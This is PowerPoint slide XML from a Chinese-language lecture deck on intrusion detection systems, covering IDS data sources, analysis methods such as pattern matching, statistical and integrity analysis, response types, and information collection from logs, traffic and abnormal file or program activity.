              <a:off x="2049" y="8378"/>
              <a:ext cx="1254"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系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="组合 44"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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8" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1503045" y="4782820"/>
            <a:ext cx="1706245" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="2687" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="174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数据库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="50" name="组合 49"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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53" name="组合 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1503045" y="5194300"/>
            <a:ext cx="1800860" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="2836" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="189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应用系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="AutoShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716780" y="3561080"/>
            <a:ext cx="2722880" cy="2321560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="矩形 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4752340" y="3843655"/>
            <a:ext cx="2687320" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"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对用户行为进行分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4559935" y="4095750"/>
            <a:ext cx="2023110" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3186" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="224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模式匹配</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="65" name="组合 64"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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8" name="组合 67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4549775" y="4531360"/>
            <a:ext cx="2030730" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3198" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="2253"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统计分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="70" name="组合 69"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="71" name="图片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3" name="组合 72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4561205" y="4954270"/>
            <a:ext cx="2242820" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3532" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="258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完整性分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="75" name="组合 74"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="76" name="图片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83" name="AutoShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7777480" y="3561080"/>
            <a:ext cx="2722880" cy="2321560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="矩形 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813040" y="3843655"/>
            <a:ext cx="2687320" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"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对分析结果安全响应</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="组合 84"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7746365" y="4095750"/>
            <a:ext cx="2023110" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3186" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="224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主动响应</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87" name="组合 86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="88" name="图片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90" name="组合 89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7736205" y="4531360"/>
            <a:ext cx="2030730" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3198" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="2253"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被动响应</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="组合 91"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="93" name="图片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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE60DA9-EA6F-4BED-8E5E-A673420EA3DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工作流程</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792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在网络上中若干不同关键点收集信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4631690" y="2092325"/>
            <a:ext cx="4891405" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7703" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="6384"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系统和网络日志</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4" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4644390" y="2607945"/>
            <a:ext cx="2355215" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="3709" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="2390"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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>网络流量</a:t>
              </a:r>
              <a:endPar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9" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403985" y="5273675"/>
            <a:ext cx="9820275"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入侵检测很大程度上</a:t>
            </a:r>
            <a:r>
              <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依赖</a:t>
            </a:r>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收集信息的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可靠性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>正确性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835785" y="2325370"/>
            <a:ext cx="2846070" cy="2655570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4657090" y="3146425"/>
            <a:ext cx="4512945" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7107" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="57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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>非正常的目录和文件改变</a:t>
              </a:r>
              <a:endPar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nvGrpSpPr>
            <p:cNvPr id="29" name="组合 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>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2" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4669790" y="3696335"/>
            <a:ext cx="4512945" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7107" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="57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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>非正常的程序执行</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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6"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37" name="组合 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4681220" y="4256405"/>
            <a:ext cx="4512945" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7107" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="57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en-US" altLang="zh-CN" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>......</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="组合 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C24206-8408-4BAA-ABFD-56D959C331A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息收集</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61" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1455896" y="1207289"/>
            <a:ext cx="2187893" cy="1680056"/>
            <a:chOff x="142844" y="1343811"/>
            <a:chExt cx="1624037" cy="1624037"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49162" name="Picture 5" descr="DO_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="142844" y="1343811"/>
              <a:ext cx="1624037" cy="1624037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49163" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421585" y="1680586"/>
              <a:ext cx="954393" cy="1041300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>模式匹配</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="组合 84"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4602480" y="3547110"/>
            <a:ext cx="6506845" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10247" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="930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可能很简单。（例如字符串匹配查找指定的条目获指令）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87" name="组合 86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="88" name="图片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90" name="组合 89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4615180" y="4049395"/>
            <a:ext cx="6737350" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10610" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="966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也可能很复杂。（例如利用数学方式表示安全状态的变化）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="组合 91"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="93" name="图片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0" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1633855"/>
            <a:ext cx="46939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网络入侵行为模式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="2167890"/>
            <a:ext cx="5367020" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8452" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="713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一个输出（例如获得某种权限）</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3991610" y="2877820"/>
            <a:ext cx="5634990" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8874" cy="1508"/>
